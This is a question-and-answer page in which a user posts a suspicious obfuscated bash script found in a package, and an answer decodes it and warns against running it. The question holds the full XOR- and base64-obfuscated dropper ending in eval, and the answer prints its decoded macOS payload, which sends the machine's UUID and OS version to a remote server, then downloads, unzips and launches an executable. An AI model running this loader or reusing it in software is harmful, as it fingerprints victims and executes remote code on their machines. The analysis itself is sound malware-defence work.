Search code examples
bashevalobfuscation

A suspicious bash code, who can help me interpret it?

Unpacking a package, I found a piece of code, because I am not good at bash, I don't know what to do, but I suspect it is a malicious code, who can help me interpret it.

#!/bin/bash
_l() {
    _i=0;_x=0;
    for ((_i=0; _i<${#1}; _i+=2)) do
        __return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
        if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
    done
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}

_m() {
    _v=$(base64 --decode <(printf "$1"));_k=$(xxd -pu <(printf "$2"));
    __return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
_y="8903139122"
_t="MWIxODFmNTE1ODVkMTY1MzUzNDE1MDE5M2EzOTc0N2Q3YTZlNjI3MzZiNmEwZDExMDkwYTA5MDIwMzAxMDEwODAyMDExMzM5Nzg2MTYyNmQ3Yzc2N2Q3Mjc4N2QwNDEzNDU0NTRmMTc1MTVlNTI1YTU3MWY0MTQyNTk1YTU1MTEzYjcyNjk2MTZkNjA3NzZjNjQ3NjBjMTE1ZDVlNDU1YzU0NTY1MTU3MWU1NzU1NDI0NjEwMzI0YzVlNDk1ODQzNjY0MTUzNDE0YjRlNWY0MTU1MGUxYjAzMDAwMzAxMGEwMTAwMDEwYTAxMDkwYjAyMGIwODAzMGEwMDAxMGIwODEwMzgzMjU2NDM2YzQ3NTY0YjQyNWI1ZDU2MDQxMjE3MTk0MDRlNmU0NDU3NGE0YTEwMWU0MTQxNTY1NTQ3NTE0YzZmNTU0MTQyNWE1NjVmMWIxMDE4MzM0MzU2NDI0MDUwNWU1YzZkNWY0YzU5NTcwYzExMWQxOTQ3NDc1MTVkNTc1NjVmMWExYjExMzg1ZjU5NWE1ODVhNWY1NjY2NTg1NjBmMWExZDE4NTY1MjViNTYxMTFmNWMxODFiMTQxYjU4NWM0YjU0NTUxMjE1NGI1NDAyMTExZTVhMTE3YjdkNjg1NTUxNDc1NzVjNGI1Yzc3NGE0ODVjNDI0Nzc1NTY0ZjU4NTE1NzE4NDUxMDU0NDM1NjQ5MTExZjVkMTgxZTEyN2E3ZTYzNTU1MDQ2NTQ1NzRiNWQ2NjY0N2E3ZDEzMTIwZjE4MWI2YzFiMWYxOTY1MTgxMDE1MTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzMxNzFiMTAxYTYzNjcxMjZlMWExYTFiNzE2ZTAzNzg0OTE3MWExMzEzNDUxMTQ2NDAxODE0NTQ1MDExMTQ2MjZhMDg0MjRhNTA1ZTQ3MGI2ZTY0MTYxYjEwMTgzMzNhNDY0MzVmMDQxMzVhNDY0YzQ5MGExYzFlMTc0MjcwNjI2MjY3N2Q3ZjdlNzA3YTc3NGMxZDE2NDM3ODYwNjM2ZTYxNzY2NDY2Nzc0NTA2NWQ1YTU1MGUxZDRhNWY1MzViNTE1OTVkNTQ2YzUwNTU0ZjE0NGIwNDE0NDg0MjU2NGE0MjViNWQ1NjY2NTc0NjU4NTc0NDE3NWQwZjFjNDI1ZjQwNmU0NTVjNDM0MTViNTc1NzRkMTU0MTBlMWQ0YTc3N2M3YjY2NjA3MjYyNjA0NDEzMzg0NjU1NDk2ZjQzNTA0NzUxMGMxMDE2MTA1NDViNDc1NDVlNDkxMTFkNDY1NTQ5MWY2YjY5NmI2MTY5NmE2YTYwNjExOTExM2I1MDRjNDM1ZTEyMTU1ZjAwN2YxMTExMWQ0YTQ3NDA1NDQ0MTIxMzBmMWM1ZDU0NDQxZDU2NGM1YzVmMTEwMTA3MTcwMzEyMDYwNzEwMTc0YTQ3NTQ0MTZkNDI1OTRkNTg0ZTExMzk1ODQxNDI2ZDVjNTA0MjBlMTMxNzExNWM1OTQ2NWQ1NDQwMTMxYzU3MTkxZTQ2NWY0ODE2Njg2YjY5NmI2MTY5NmE2YTExMTYxMjEzM2I0NjU3NGI1YjQyMTgxNDYwMTMxMzE3NDI0NDVjNDg1MTQ5NmY0MzUwNDA0YTQ2NWQ0MDVjNDQxMjEzMTMxNzQyNDU1ZjQyNjc0OTUxNDc1OTRlMWIxMTFmNTYxODFiMTQ0ODUwNDM0OTZlNTY1YjRhNDQxMjEzMGYxMzE2NTU1NzQ0MTc1NzQ1NWY1ZDEzMGIwZjE0MDMxODMzNDI1ZTExMWU1ZjExMTY0OTRjNTQ0MDZjNDE1MjRkNTk0ZjEyMzI1ZjU5NWY1NDZjNTc1MDVmNTcwNTFiMTQxYjU2NDE1YzQxMTIxZjU1MDgxMDFlNDcxMzFiMWIxYzUzNDg0OTEyMTMwZDFiNTU0MjEyMWYwOTE5MTIxNzRhNTI0OTQxNmQ1NjUxNGI0ZDExMTgxYTFiMTEzODQ0NTc1NTQ1NWU1NDZjNTc1MDVmNTcwNTFiMTQxYjU0NTA1MTVlMTIxZjU2MTkxMjE3NGE2MzZlNzU0ZjEwMTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzM2NzE5MWQ2NDU3NTU0NTVlNTQ0MDE2NmE2YzFkNjUxMjE5MWMxZjE5Nzk2ZDAzNzI0ODFlMTkxMTExMzk0ZjVlNWU0NzU1NWM2ZjVkNTA1ZTVjMGMxMDE2NDM0ZjVmNWY0NDVlNWM2ZTVjNTM1NTVjMWYxYzExMWMxYzAzMDI0ZjFhMTkzYTUwNTk1ZTU2NTUxMjE5NDAxOTEyMTc0YTUyNDk0MTZkNTY1MTRiNGQxNzRhNTU1MDVkNTc2ZDU2NTg1ZDU2NGMxYzdhNWU1YzQ2NWQ1NzQ0NDAxZTdlNTg1MjdkNjExYTE2MWExMzNiNWM0OTU0NWMxMjE1NTgxMDExMTU0ODU4NDE0MjZkNWM1MDQyNGUxNTQ4NWY1ODVlNTc2NzU3NTE1ZTU0NGUxYjExMWYxZjU5NGI1NzQwMTExMTRhMTMxMjEwMWM0MjQzNTY0MjQwNTA1ZTVjNmQ1ZjRjNTk1NzRjMTExOTEzMTY0OTRlNTY1YzQ2NWM1NjY2NWY1MzVmNWQ0NDEyMzkK"

eval "$(_m "$_t" "$_y")"
Solution

  • The two functions at the top _l() and _m() read in the two strings _y and _t. _t contains the obfuscated code and _y acts sort of like a key. The key is applied, letter by letter to the obfuscated code creating a base64 string that can be decoded into a bash program that the eval command can execute.

    Removing eval and echoing the results like echo "$(_m "$_t" "$_y")" spits out the code that will be executed by the eval command. This is perfectly safe since we aren't actually evaluating the obfuscated code now:

    #!/bin/bash

ENC_PASS=<somepasswordhere>
APP_DOMAIN=<somewebsite>
APP_ROUTE="download/dlst"
unzip_password=<anotherpasswordhere>

os_version="$(sw_vers -productVersion)"
session_guid="$(uuidgen)"
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"

url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path}
app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1
rm -f ${tmp_path}
file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))"
volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')"
volume_name="${volume_name// /%20}"
chmod +x "${app_dir}${file_name}/Contents/MacOS"/*
open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"

    I would suggest NOT running that. Editted to remove the website and passwords just in case this obfuscation is done by some very crafty but derilect developer and isn't actually malicious... although this is almost definitely malicious. You can run without the eval yourself to see the redacted bits.

    At a high level this sends your comp info up to a server and downloads a zip file. The zip file is unzipped, the contents are made executable, and then they are executed. This will only work on Mac due to the MacOS subfolder in the zip (duh) but also the use of ioreg program to collect the data stored in machine_id which is sent to the remote server.

    Next step is to get that zip and see what it does. I'm not downloading it though ;)